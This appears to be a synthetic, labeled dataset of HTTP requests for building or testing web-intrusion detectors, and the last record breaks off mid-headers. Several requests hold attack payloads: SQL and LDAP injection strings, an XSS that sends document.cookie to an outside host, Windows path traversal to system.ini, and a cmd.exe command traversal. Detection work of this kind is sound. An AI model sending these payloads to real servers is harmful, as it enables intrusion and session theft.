Proxy-Authorization: NTLM aW9jckVuZWh1OXRia2xPZWF0bm13cXRSM29nZXBBcnJaYXl3bFRuaGFhc2RwQW9h
Authorization: Basic bXJsbzpuU2VuYg==
Range: 424-5049
Referer: http://www.iadeN.cz/Stoegneg/rrnnom/sryc/dhEis/do7idiH.wmn
TE: chunked,trailers,chunked;q=0.0
Trailer: If-Range
User-Agent: Mozilla/1.3 (compatible; Rpea; WinNT; qteccNnp; aihgnyu; 8oei)
UA-CPU: x86
UA-Disp: 818,3466,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 810x5301
Via: 0.4 www.l0otos.tiff:0586, 9.9 www.nLdeuh.tiff, uozaar/4.8 179.54.133.78
Transfer-Encoding: identity
Upgrade: rCtoOd/1.7, sri/6.5, kddsop/1.3, LOZg/6.8, enie/8.5
Warning: 094 31.28.84.149 "sfI0urex0ead6neeIo" 
X-Forwarded-For: 247.91.86.17
X-Serial-Number: 5993658067550
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 19391
Start - Id: 41200
class: SqlInjection
GET /gY6WetcT/f1enor/kab8/lsYcqDLef0RMtN/eN7TxWJ3AgZLaqc7lLxq/oj2IcRuI/pwwxirise/hQbn-3lr5t0gp5uI/srwGtelbteemrvoe9/hks-c@PI5.LuCKK6gEyK/BHKNzrcpC.tiff?@GZ-=rbtSeerA&zo6=fTl&hnLnull=5959290&etruedn=dteibbENelhtCl&SFjYZ4oBg=030528&edaissetp=itnl7asnK&oyk=8368&Te8gldc0t6etdc=rneucmdj%28+o%249aOL6ut3ap&CYsamphptupshutdownscript3G6=481&TdbgsoundX=7889&toeda=ugFS&ameco8owt=onOln3pesa HTTP/1.0
Host: www.ievap.fr
Connection: D2ar8hce
Accept: image/gif;q=0.9
Accept-Charset: *;q=0.1
Accept-Encoding: deflate;q=0.1, compress;q=0.5
Accept-Language: *;q=0.9
Cache-Control: aa=edafhjb3
Client-ip: 28.28.15.165
Cookie: r2o=laEsr;turclnem=e.K@lAUz_
Cookie2: $Version="6"
Date: Mon, 30 Jan 06 05:15:00 CET
ETag: W/"EEGkhT5mI@eMWl_1"
Expect: ttfr=i4irsb;s65p1tr=etl9i
From: aaoa@eCueedro8q.cz
If-Modified-Since: Thu, 17 Feb 05 18:11:01 UTC
If-Unmodified-Since: Mon, 10 Mar 08 13:05:15 UTC
If-Match: "VLk6Hk1THR8xrseFm9"
If-None-Match: "HpaNwuQLt.8twM35"
If-Range: *
Max-Forwards: 633
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: QnNEm sle7s=ykdes
Authorization: NTLM cGRyaXRGbHRmTmVPeXZ3aHNoZHRyb290dHRwaHNMY2Fzb2F0
Range: 38-,7259-27,6749-28
Referer: /oiUe/1IlZ/nrnDtaI.wav
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: ' UNION         ALL            SELECT  toote8En  FROM  o9    WHERE     ''    ='
UA-CPU: MIPS
UA-Disp: 8221,0714,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 9560x6945
Via: 3.8 227.50.107.176
Transfer-Encoding: compress
Upgrade: yghpnh/9.7, hoCeOc/6.1
Warning: 671 80.33.40.15 "i4sm64ftefxa" "Thu, 27 Jan 05 16:05:22 CET"
X-Forwarded-For: 25.2.55.98
X-Serial-Number: 9505530425947859
----: -------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 41200
Start - Id: 9050
class: Valid
GET /Mujaccess_logfKsNq_F/Ljinclude0TQ/witepnxed1hDiasfmh/djoessrb30ioo/ttdrmosd/t1T8lvifTR/nnRZTacualG3EXLCBzmI/ymon2md/XIpJoptEA_rh/rTo21SOrla1ys/x09tmc.gif? HTTP/1.0
Host: www.soeaotie.de
Connection: keep-alive
Accept: image/*;q=0.9, image/png
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 168.206.47.117
Cookie: thlaebshxqer=266402664;nksehce=dm02DzLX7N;fzdal=tcikeaEhoiiesE;mi=qgYoe;YZMIxp_MHXhN=80;metawwgettSz3JtconnectV1=ye/elr6a6
Cookie2: $Version="634"
Date: Tue, 06 Apr 04 01:48:09 CET
ETag: "KoTQ8MRH79vQlgwbG_"
Expect: mjl9tid
From: nYe8@Sqo1l5.uk
If-Modified-Since: Thu, 17 Jun 04 05:01:11 UTC
If-Unmodified-Since: Tue, 13 Jan 04 09:01:54 GMT
If-Match: *
If-None-Match: "gyJBHu.nuMAb3uA"
If-Range: Fri, 19 Jan 07 11:40:24 UTC
Max-Forwards: 947
MIME-Version: 8.0
Pragma: aH=beeeot
Proxy-Authorization: Digest uri=/Otel0DNt.asp
Authorization: Basic dXM5d246aGJBdmg=
Range: -9,-8753
Referer: http://Tnewcn.de/ddrtd/eers3t/h8io/sEeaiT/s4s7g.msf
TE: deflate
Trailer: TE
User-Agent: eguchiCtec/1.7.2
UA-CPU: 68000
UA-Disp: 539,7615,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 117x032
Via: wos5/9.2 www.wtegt.jpg, ehtcb/7.9 14.201.180.219, saitEy/0.5 103.185.29.250
Transfer-Encoding: compress
Upgrade: oicaw0/1.6, fIvar4/1.2, iut7eu/0.8, 8nbl/3.1, 0ehUrq/7.3
Warning: 394 66.20.115.11 "wuelrtshiipI1Cr9mi" "Mon, 05 May 08 03:16:51 CET"
X-Forwarded-For: 41.199.240.170
X-Serial-Number: 442361
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9050
Start - Id: 38648
class: LdapInjection
GET /k@rw/koRMLp4.VA/ds4DnennypOshtvR/TVSU9.jsp?iaeoao=taateheni&B9msdud=aHae0obr&e7wccumIlogsEa=719728&QjiRgc-log=1093568455&kWVY3Hf=80957860&rpofojho=dX7BNCfEmP&carpm=69460&tea=53&zGfC6hxAC4=%29+%28+%7C+%28taHzn%3Dxlpu*%29 HTTP/1.1
Host: 24.153.71.201:80
Connection: ufiti8W
Accept: image/jpeg, video/*;q=0.7
Accept-Charset: us-ascii;q=0.0
Accept-Encoding: *;q=0.8
Accept-Language: trrA-u;q=0.5, enwouts-sjsmch, eNesHoil-ltg6gwgc;q=0.6, seqco-oefiE
Cache-Control: no-transform
Client-ip: 48.249.181.128
Cookie: ttasthtxnnygpse=LotrhamxeaMoovnlo;7edsU=2347;prxtre0=698129;lVMV9qGPYcR=vn4fmo;HmWV=5376594;rrw=n
Cookie2: $Version="463"
Date: Sat, 21 Oct 06 15:21:16 GMT
ETag: "9WmL6Zj2qJvQQYwY"
Expect: 100-continue
From: omeiaw@etteheLi.gov
If-Modified-Since: Wed, 14 Nov 07 04:24:46 UTC
If-Unmodified-Since: Sat, 13 Aug 05 04:29:56 UTC
If-Match: "1vHWTsKFAq2l.Xr"
If-None-Match: *
If-Range: "8bgzxnzsxYeTvi5_KeH"
Max-Forwards: 07
MIME-Version: 7.4
Pragma: hlhe='i5du'
Proxy-Authorization: NTLM ZXJBcHl0Y2RzZXVvdXBlWmRhbjd0cmp0dnRpNTFmTlJjcmV0aQ==
Authorization: ee1i s6s1sO=fl8rhr
Range: 25834-,48-325537
Referer: /ureddAl/u5ts/snYu/l6IR.mspx
TE: deflate,chunked
Trailer: Transfer-Encoding
User-Agent: t3sX4rOoZ http://www.rvtaba.gov
UA-CPU: StrongARM
UA-Disp: 397,637,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 601x4009
Via: HTTP/2.2 www.f8ed.gif
Transfer-Encoding: ng8eer; lOid=elim0Ro
Upgrade: ehlec/7.4, tt07/0.9, ls7e/0.7
Warning: 509 249.249.5.171 "evmsicsfdrnmFbad" 
X-Forwarded-For: 72.129.37.147
X-Serial-Number: 15901278083
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 38648
Start - Id: 29488
class: Valid
GET /r9@XpNif4lvIO/gh2objw6bmeir/sataetjof/erF9a/ysC_79PII794Fn2s@VGT.png?1gNxqrT5theaeTu=eito%27nNe7u3&tenla=6&@dYxVcsOla=aWxIWaDLH HTTP/1.0
Host: www.rjawl.org:1
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: Ed-ln;q=0.2, famtmbys-ir0et;q=0.8, s3tse1b-cifentn;q=0.8, 2h0r-tjnftqT;q=0.7, MCtkoe-eet
Cache-Control: no-store
Client-ip: 164.108.162.104
Cookie: qan4e=9ai'n;Ss4birEeentdQb=hw90rMK9SPK5;skneieOgtm=ol
Cookie2: $Version="626"
Date: Mon, 17 Mar 08 14:02:10 GMT
ETag: W/"wUZdMJW-5GbCkeQQdz_"
Expect: uneeteg
From: hnoyso@ioJaegaa.st
If-Modified-Since: Tue, 15 Jan 08 23:38:38 UTC
If-Unmodified-Since: Thu, 11 May 06 06:32:32 UTC
If-Match: "boE8VfV65i-q3Qd6uOJ"
If-None-Match: "MbmAiwYg2ali60hBmVFR"
If-Range: "qcL.gO8r1j-F-07_"
Max-Forwards: 918
MIME-Version: 3.9
Pragma: rnm=ot
Proxy-Authorization: Basic N2x1MjpjdzdyZXM=
Authorization: NTLM aG1zdGl4bWR6d2hndHRsdHZ1cWlkaTBpam5mc2d0bEV0aGlodGNtYWV0cHg=
Range: 6551-
Referer: http://wyne.st/ceopn/sl0btI0t/ia6bEao/WealEbr.shtml
TE: chunked,gzip;q=0.7,trailers
Trailer: Host
User-Agent: Mozilla/0.7 (Windows; U; Windows NT 2.4; H6-ae; rv:7.7.9) Gecko/45021647
UA-CPU: Sparc
UA-Disp: 3759,7587,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 522x597
Via: 9.6 54.168.60.135
Transfer-Encoding: compress
Upgrade: nene/2.6
Warning: 270 101.148.72.64:95 "i8edoTSEtsz" "Wed, 28 Dec 05 21:22:16 CET"
X-Forwarded-For: 160.172.24.250
X-Serial-Number: 801273405
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29488
Start - Id: 42118
class: SqlInjection
GET /sZO7PMFxKDlIz_n9Mp/7xvTHUC.I/BQ5rzsGacceptTNHtwi/0S_FfHIqbWbEC1s/mhFlntenoNeottoiyh/itsjovtLtegzIob0l8ha/twz.php4?ornooaeE=+nconnect6&towy=71905251&edshdloile=%27+++++OR+++%27%27++%3D++%27&Isewc=a60gYM2AX&3i8eranhdpyeeo=edatN&hdaufywMno7=egroo%3EtoafiyW%3Cat&QEu4iK@F=nsBaKcjt&iqtlntct=txOhV&WtK6BSKMpor=hy46fb-U HTTP/1.1
Host: 73.14.60.49
Connection: close
Accept: */*
Accept-Charset: iso-8859-6, iso-8859-1;q=0.0, x-mac-japanese, iso-10646-ucs-2
Accept-Encoding: *;q=0.0
Accept-Language: srtcsudi-tcTyaobd, eqi-eee;q=0.8, ntelRYt3-n;q=0.5
Cache-Control: max-age=474
Client-ip: 123.133.143.196
Cookie: tnrt4yDh=2322283835;YmQ77netcathtpass=lNtetiadmql;mA4frqinelLtb=87;7tphod7yuc=iZTH9j7V;efaesfd=nm&tncopen4emwtl]aechoe?i
Cookie2: $Version="353"
Date: Fri, 02 Jun 06 17:42:45 CET
ETag: "36ABV77V@jd_sdUj"
Expect: aeUss=7wjdte;uElxnLe
From: jqr1h@steT4irua.uk
If-Modified-Since: Wed, 26 Mar 08 20:31:22 UTC
If-Unmodified-Since: Sat, 14 Apr 07 05:19:04 CET
If-Match: "@25fmCZ8gz2f@E_bMJ"
If-None-Match: "1CYOhi3upGPrFe2R81bB"
If-Range: Sun, 14 Jun 09 17:42:16 UTC
Max-Forwards: 513
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: Basic ZXZ0b25hczpyd2VpZQ==
Authorization: Digest realm
Range: 80-3804,023297-91,09-
Referer: http://www.4alna.ch/taritehe/8isuen4d.gif
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/3.2 (X11; U; Linux i586 8.4; b9-Ns; rv:0.5.7) Gecko/41863867
UA-CPU: MIPS
UA-Disp: 7194,078,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 051x7587
Via: dto/9.8 www.nggan.jpeg:808, 1.1 164.60.70.204, 7.9 159.129.86.145
Transfer-Encoding: identity
Upgrade: rcbt/8.5, asrs/2.2, wsnl/5.1, trldRe/2.1
Warning: 310 236.101.41.30 "heS1" "Tue, 01 Aug 06 04:08:43 UTC"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 912151407
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42118
Start - Id: 1023
class: Valid
GET /uiaeNl4vldRurApeDdN/WalauweceLe6Xufnin/tsts/belrh/rD1iI7D_y3Nhj_f.png?cijaEwah=1iSa&ech=ciems++mnt8s&hKoBQDdlink=hE+weOhoautoexecstdin+positiondE%29+edm&qo3O=tnosock_streamsrg%40obslogu&jneutewsl=wto&o0ebrgt=no%24&10agt=oVu%40HZJuynIA&ii5tAais=mmDG&yli=dG4pM8jYu&bsopoe457eE=y&gcms9hs=351&sq7y7oe=dbd%24Oae&sonkei8bde=txD%40Ubq&xaperqmeiosMes=pl+positionWtbeywgetnt HTTP/1.0
Host: www.hAmsD55an.org
Connection: twtEEes
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: compress;q=0.7
Accept-Language: *
Cache-Control: max-age=341
Client-ip: 147.230.207.208
Cookie: arjc3oehnee=sqmlon6Cd0En;EsireAo=S;pxAsnnrhhpans=27312
Cookie2: $Version="0"
Date: Sat, 22 Aug 09 09:13:57 UTC
ETag: "guQP-vgLmi_nEuJ8"
Expect: rfgminow=esd5ti;hfoor=rhnhnie
From: iyiqd@OJte.cz
If-Modified-Since: Sun, 21 Jan 07 12:24:52 UTC
If-Unmodified-Since: Sat, 08 Jan 05 20:43:30 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 8.6
Pragma: jsrmt='N'
Proxy-Authorization: NTLM ZXRkaFRwOGxkZWczaTdkODZsUzlzdGljamxhTmxhMTRyc2VvYXRjb2xuYWl3
Authorization: Basic cnNzbDQ6NmFTN2Q=
Range: 339-65412,180-85,-47
Referer: /wrkoof/ctthyr/Eelh/I7utai/aoeorea3.msf
TE: deflate,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/4.0 (Windows; U; Windows NT 7.2; lI-he; rv:2.7.1) Gecko/83689509
UA-CPU: MIPS
UA-Disp: 108,3114,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 5033x777
Via: FTP/0.3 www.mfueD.png, 0.9 106.4.118.206
Transfer-Encoding: gzip
Upgrade: Rhhtb/3.6, ren/5.0, rt9em/3.6, nixTd/5.6, oeeAEo/3.8
Warning: 645 153.196.97.71:9 "3Eh9r9qmo" "Sun, 18 Jun 06 20:12:04 GMT"
X-Forwarded-For: 162.75.24.52
X-Serial-Number: 90115734669182651364
----: ---------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 1023
Start - Id: 18057
class: Valid
GET /aFzxyu/oGAaE8G4S/angTV/rCZkCN.jsp?4Fi2Soz=El&9baemGaih=39414&ws=0143210&nntbd=88&fcyha=lUr&3wul7=9379&fcmLkebmNacBsue=aln&Tnnbhp57s=exonepgeunHuR&sadAdnael0mlC4E=sDTyeSP&l41i0a4dI=1197424931 HTTP/1.1
Host: www.6bfeaj2.gov
Connection: close
Accept: audio/*, image/gif
Accept-Charset: ks_c_5601-1987, euc-jp;q=0.1, koi8-r, x-mac-greek
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: max-stale=722
Client-ip: 6.255.150.52
Cookie: aeetlrerpp=er$sheh+:w3e3aidrop;dlnyqssbEas=00;Uriio6r=82259863;iHe4=025914;74oSnpa=8649
Cookie2: $Version="013"
Date: Sun, 25 Apr 04 10:58:17 CET
ETag: "G.hNXzp6p44Yx7Thyh"
Expect: 100-continue
From: ubo9@noxriwRe.cz
If-Modified-Since: Thu, 25 Dec 08 11:19:12 UTC
If-Unmodified-Since: Sun, 26 Sep 04 15:04:33 UTC
If-Match: "Neyg2-t0-.kHSuV21"
If-None-Match: "cKy4_rCKIq6hsb0M."
If-Range: Sun, 13 Mar 05 22:22:28 CET
Max-Forwards: 3427
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Basic YWRzZTpHeXdl
Authorization: Basic c3phaWJuem86c2NlaDRu
Range: -498682,294755-,-12868
Referer: http://cb6w.uk/ASoco2e7/hraes5/whoa7.css
TE: gzip
Trailer: If-None-Match
User-Agent: Mozilla/5.8 (compatible; ebceEie; Win 9x; kpo8eo)
UA-CPU: PowerPC
UA-Disp: 9424,5309,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 519x975
Via: 0.0 14.157.168.174, FTP/0.8 www.sdoE.shtml:774, 3.4 www.oluiid.html
Transfer-Encoding: deflate
Upgrade: tdlvc/2.4, nwdaao/9.3
Warning: 781 78.175.59.108 "s0atoompRe" 
X-Forwarded-For: 169.12.78.179
X-Serial-Number: 77947378767
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18057
Start - Id: 4579
class: Valid
PUT /h8RC61LDMoAUOex6/4htxRo7tda/o2mnea6a/bKheO/as3Lpmyctonis9e9mrhb.asmx? HTTP/1.1
Content-Length: 187
Content-Language: tul
Content-Encoding: identity
Content-Location: /0pdndie/spjltnsn/agesiT.tar.gz
Content-MD5: djBsbGVibEtoQWNndEUybA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 28 Aug 06 12:00:30 CET
Last-Modified: Sun, 29 Apr 07 18:35:34 CET
Host: www.asrt.it:93
Connection: keep-alive
Accept: image/png;q=0.8, image/gif
Accept-Charset: *;q=0.4
Accept-Encoding: gzip;q=0.0, compress, identity, deflate;q=0.1
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 241.23.128.126
Cookie: td=ah5efteWsieds;drAiaEaw1=e/epHi;e2s=005;tdr8sousrEtDuwq=6
Cookie2: $Version="006"
Date: Fri, 02 Jul 04 05:03:17 GMT
ETag: W/"vuwqQYwLICNtYcw6B@4"
Expect: tann=tOETelys;4ivrTo
From: a5wn@h3Rit.be
If-Modified-Since: Sat, 09 Oct 04 24:53:39 GMT
If-Unmodified-Since: Sat, 12 Nov 05 01:21:19 CET
If-Match: "Ldan5XskSURV@GJ.e_"
If-None-Match: *
If-Range: *
Max-Forwards: 735
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: NTLM bzhzeWdFb2U4c3R0bm9adWxhemVyRXJpY2V0cHd1a2V0ZGVhaXR2c29vdHNjbndk
Authorization: taps elnih=oajRi
Range: -6763
Referer: http://thbinhH.cz/icdwnm/5wsts/eel5t.nsf
TE: trailers
Trailer: Host
User-Agent: Mozilla/2.2 (Windows; U; WinNT 3.6; ii-st; rv:0.7.6) Gecko/92829172
UA-CPU: StrongARM
UA-Disp: 067,349,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 1436x3813
Via: 6.5 2.226.128.18, HTTP/9.3 163.170.56.223:55289
Transfer-Encoding: ipIaiI
Upgrade: y3ba/9.8
Warning: 486 www.o1emOvc.jpeg "et3dsadpnrneep" "Thu, 23 Feb 06 09:52:01 GMT"
X-Forwarded-For: 210.240.131.9
X-Serial-Number: 09527
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

qghmxthnt7wa== Neh&ofbaas6s=ebbHj-&ptaZoneimsla=6ruzrf4rEb&sd=igzx&3vGccNgIy=aiivyN5eaGl&qO80rr0ar=npassthru&wiLteZunog=47885&i6mtb=80&ohttthuefnhc=6@RnelsIrnscnode&dn7dtaeIwaGos=ft0d

End - Id: 4579
Start - Id: 30063
class: Valid
GET /rrarer.htm?nnrfDmnaShidiPa=cD3&Es8lpgTahiE=eo+hhtNiY-a+Airre&eht=-l%7Eltio&rcPL8E78k=3VbEqVae97pieacnGr&Gnullhtpass2MLVp2@passwd=wtn&saho6=ie6at5ae+oieq&hTi=Ix+%3A2&eo=13124996 HTTP/1.1
Host: 6.15.252.222
Connection: close
Accept: video/*, text/*, audio/x-wav;q=0.0
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: t-no82hxh, etgvhg-rusezn7a, sckrJeq-gaso, aceie-spaclr;q=0.2, gt-a1h2n;q=0.3
Cache-Control: no-store
Client-ip: 21.39.235.102
Cookie: qsiaNc8Unssb=Eleyltne7otilfrompechos5<
Cookie2: $Version="16"
Date: Wed, 10 Aug 05 07:35:33 GMT
ETag: "X4X3wSkRbcqHJDFv7fQ"
Expect: dcin=m4dot
From: 8hdarpl@eewtgm.st
If-Modified-Since: Sat, 29 Dec 07 01:24:00 GMT
If-Unmodified-Since: Fri, 03 Oct 08 11:15:31 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 0.9
Pragma: eydrc=snvead
Proxy-Authorization: hh5ore wukONet=mohs
Authorization: NTLM Z0V5czVoZW53b2VBbGNBbm80ZUFoZGxwYVNobHMzdHljbWFpZW4=
Range: 801-,-797
Referer: /cok0.fgf
TE: chunked;q=0.9
Trailer: Referer
User-Agent: eeSurhwcn (r_sl2DO; rOb@DkRJF; oVPFQkMy)
UA-CPU: StrongARM
UA-Disp: 794,239,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 8553x7465
Via: t00Fs/8.7 www.M0uTld.htm, 2.8 255.89.169.43, FTP/4.3 www.iNyt.html:9
Transfer-Encoding: compress
Upgrade: nAijsd/7.5, o6a/9.9, ptft/5.9, fof9/8.2
Warning: 496 239.40.26.43 "thgzpmOrfs4aeg" 
X-Forwarded-For: 255.243.109.163
X-Serial-Number: 418347308
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 30063
Start - Id: 48141
class: XSS
GET /sa_/iwB/Tnovnwog/rWWHAd/hEaHsshtnxzekuQs.png?shani0uC=nam&ivdsxsaneeoNi7l=O%3A4&lbehc=wo3Tepuu&eswYyv4r1fcNl=%3Cmeta++++http-equiv+++%3D+++%22+++refresh++%22+++++content%3D+++%22+++0%3Burl%3Djavascript%3A++%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.ertiie.com%2Fcgi-bin%2Fanmaicte.cgi%27%2Bdocument.cookie%29%3B%5D%22%3E&ettteht=U&eieityioe=n2N&axaolalnlAeomS=1 HTTP/1.1
Host: 248.233.151.209:80
Connection: keep-alive
Accept: image/png, application/*, video/mpeg
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.2
Accept-Language: deoe7-wt4;q=0.5, indrR7e-oei9oe, r-ls8;q=0.1, euf-S3wc
Cache-Control: no-store
Client-ip: 87.104.252.168
Cookie: e2vlasnHj= C;ni=z taqlh7hmnh
Cookie2: $Version="618"
Date: Sun, 01 Feb 09 17:22:31 GMT
ETag: W/"dP0f@L8t3uYSaQ2"
Expect: fh2IAlI=egbfsrrd
From: terhoe3@ygfzae.st
If-Modified-Since: Mon, 03 Sep 07 02:10:43 GMT
If-Unmodified-Since: Tue, 25 Apr 06 23:49:44 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 54
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: iteOs shsTayq=nesE
Range: -54
Referer: /608cssr/s3Iemeen/caalss/at83/yhzk.gif
TE: trailers,deflate;q=0.1,trailers
Trailer: Trailer
User-Agent: odsVoUD http://www.hgsc.be
UA-CPU: Sparc
UA-Disp: 121,8495,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 8071x836
Via: HTTP/0.7 22.174.38.211
Transfer-Encoding: gzip
Upgrade: ahrnb/9.3, dedEnm/2.8, Knaee1/4.9, betzh/8.1, EaMe1a/1.8
Warning: 934 182.60.171.172 "mrhrn7etePlbs" 
X-Forwarded-For: 112.65.225.240
----: --------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 48141
Start - Id: 36077
class: PathTransversal
GET /bW@P.nsf?QL60a1ftpR=l0xd6sQKbnE&Asew=8441&4ugalcataChc=99477&mD=0229&rtsh1e6ebsEpeZ6=apasswds&oEspntoi6c=wham&tepnzcN=..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&nt9iovdnewys=0353888160 HTTP/1.0
Host: 126.219.15.139:9065
Connection: keep-alive
Accept: image/*;q=0.3, application/*, text/*
Accept-Charset: shift_jis;q=0.5
Accept-Encoding: deflate, gzip, identity
Accept-Language: *
Cache-Control: no-store
Client-ip: 150.142.192.26
Cookie: tFdyT=osiio6ae
Cookie2: $Version="080"
Date: Mon, 24 Jan 05 17:05:21 CET
ETag: W/"CHRBHIdtJ0gNNdG"
Expect: 100-continue
From: Esva@5c4oorIai.it
If-Modified-Since: Tue, 02 Jan 07 09:51:21 CET
If-Unmodified-Since: Thu, 28 Feb 08 20:12:43 CET
If-Match: *
If-None-Match: "yf1XiIeeQHcng@K"
If-Range: Sat, 24 Jan 09 01:04:56 UTC
Max-Forwards: 4
MIME-Version: 8.7
Pragma: whohf='3ySteel'
Proxy-Authorization: Basic ZXd3b2Y6aHh0YQ==
Authorization: diW0 aiue8nd=tsaL
Range: 67-310757
Referer: http://www.atdOet.de/RdwsfaEo.png
TE: deflate
Trailer: Warning
User-Agent: reoh/0.9
UA-CPU: Sparc
UA-Disp: 6269,3972,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 039x0543
Via: 6.4 34.115.139.143:7255, 2.0 97.153.193.135
Transfer-Encoding: deflate
Upgrade: sztad/3.9, y9oto/3.0
Warning: 082 205.217.116.11 "oJcacgojmdrj" "Sun, 02 Dec 07 19:43:37 UTC"
X-Forwarded-For: 45.91.182.246
X-Serial-Number: 6525817077743739404
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36077
Start - Id: 44074
class: OsCommanding
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.innas.net
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 103.148.81.42
Cookie: 3ndrtsa4o=gcthLh0rtjarse
Cookie2: $Version="25"
Date: Mon, 23 Nov 09 23:16:01 CET
ETag: W/".Z.c4.xeA3kSTWv"
Expect: 100-continue
From: eyde@enOee.biz
If-Modified-Since: Tue, 06 Feb 07 13:40:22 CET
If-Unmodified-Since: Wed, 27 Jul 05 20:03:15 GMT
If-Match: "4izoy@O-uWLf6iB"
If-None-Match: "yfxEuoSE1Mxj7acz"
If-Range: "C1H9fyXqPdeZ7PAV4MsR"
Max-Forwards: 1
MIME-Version: 3.4
Pragma: r=hsrr
Proxy-Authorization: elsyeo wweq2teU=ecoga5u
Authorization: bIaa veahoau=hRen
Range: 20-
Referer: /w5yEtta/uweeeeae.zip
TE: trailers,trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/6.9 (X11; U; Linux i386 5.4; tb-be; rv:8.7.5) Gecko/76531381
UA-CPU: x86
UA-Disp: 6409,6413,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 4959x090
Via: 7.1 94.224.137.87, 1.3 www.ihyde.shtml, 9.4 47.50.23.59:6
Transfer-Encoding: deflate
Upgrade: unHis2/9.7, sDw/8.7
Warning: 247 www.hxe31.png "9a02iegsdsel8esiecoC" 
X-Forwarded-For: 180.219.181.140
X-Serial-Number: 388289600968011
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44074
Start - Id: 13022
class: Valid
GET /A7/sz1OFZmiALVlXI/la4pal2edo8ch/s53SHa/gqOOrrteneayl3nijrgr/hzgE/tkqjfAUcpp/HVp2.9oXa9/BEqp6yIFz337EFr/H8aeanihtSsdyr07.tiff?e6euAzdLor3tdre=5fGT&eytyde=46538&ihoui1kdnn=ucpasswdotssdj%29iimetaaf%3C1&FhqG31Tq@=4584016058&Gei=iIwen0buulegmah&deto=tiieohss&y6zLCOk0n=872&HicndR=rn8fyYgHqxx1&psettoa=hcvl7nfo17s&navnrreew46ajeN=hgcZimod%25ytltsusrr&ntrhiipt7tr=s+tyT&ny86t=fACZyrmk86&hdldaiils=3409985871 HTTP/1.1
Host: 72.129.134.200
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 82.22.221.79
Cookie: wfaoittEcsnzO=v~u/v;7cOvOOeg=etbt8
Cookie2: $Version="104"
Date: Mon, 14 Aug 06 23:18:56 GMT
ETag: "e24vEhrUhq6Ee1j"
Expect: 100-continue
From: 5dwe1@ebi1lgoaan.gov
If-Modified-Since: Fri, 06 Oct 06 21:41:29 GMT
If-Unmodified-Since: Thu, 09 Aug 07 22:41:41 CET
If-Match: "sUCj-U4Q4W.vIjPn"
If-None-Match: "w8F4y4NAWJwOq6I2e0Y-"
If-Range: Sat, 31 Jan 04 13:44:47 CET
Max-Forwards: 24
MIME-Version: 7.9
Pragma: rRie1='eld'
Proxy-Authorization: Digest qop=auth
Authorization: hEmo3 gtAictP=eytcrh
Range: 777-8861,-671902,43-427
Referer: http://www.6eaee.cz/oaslh6p.php
TE: trailers,deflate,trailers
Trailer: Connection
User-Agent: Mozilla/6.2 (Machintosh; U; PPC Mac OS X 4.1; ei-ig; rv:0.0.3) Gecko/90044029
UA-CPU: StrongARM
UA-Disp: 5331,978,32
